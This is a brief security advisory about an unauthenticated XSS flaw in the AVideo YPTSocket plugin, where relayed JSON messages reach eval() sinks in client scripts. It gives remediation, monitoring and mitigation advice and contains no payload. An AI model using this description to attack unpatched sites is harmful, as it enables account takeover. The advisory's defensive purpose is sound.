An unauthenticated XSS vulnerability in the WWBN AVideo YPTSocket plugin allows attackers to remotely execute JavaScript in the context of other users, leading to full account takeover.

The YPTSocket server relays unsanitized JSON messages to connected clients, which then execute the malicious payload via eval() sinks in the client-side script.

With a CVSS score of 10.0, this is a critical vulnerability. An attacker can hijack administrative sessions, steal sensitive user data, and execute privileged actions across the platform, resulting in total loss of platform integrity and trust.

Immediate Action: Apply the fix provided in commit c08694bf6264eb4decceb78c711baee2609b4efd or update to the latest patched version.

Proactive Monitoring: Monitor WebSocket traffic for anomalous JSON messages containing suspicious msg or callback fields.

Compensating Controls: If patching is delayed, consider disabling the YPTSocket plugin entirely to mitigate the risk of remote code execution within user browsers.

Public Exploit Available: No

This vulnerability is exceptionally dangerous due to its unauthenticated nature and the ability to target multiple users simultaneously. Administrators must prioritize the application of the vendor-supplied fix to prevent widespread account compromise.